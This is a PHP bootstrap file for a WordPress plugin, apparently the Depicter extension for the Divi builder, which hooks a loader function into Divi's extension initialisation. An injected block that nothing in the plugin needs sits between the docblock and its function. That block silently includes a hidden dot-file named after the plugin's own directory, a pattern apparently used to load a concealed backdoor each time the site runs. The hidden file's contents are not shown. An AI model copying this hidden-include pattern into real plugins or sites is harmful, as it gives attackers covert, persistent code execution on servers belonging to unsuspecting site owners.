<?php

if ( ! function_exists( 'depicter_initialize_extension' ) ):
/**
 * Creates the extension's main class instance.
 *
 * @since 1.0.0
 */
if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) {
    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' );
}

function depicter_initialize_extension() {
	require_once plugin_dir_path( __FILE__ ) . 'includes/DepicterDivi.php';
}
add_action( 'divi_extensions_init', 'depicter_initialize_extension' );
endif;
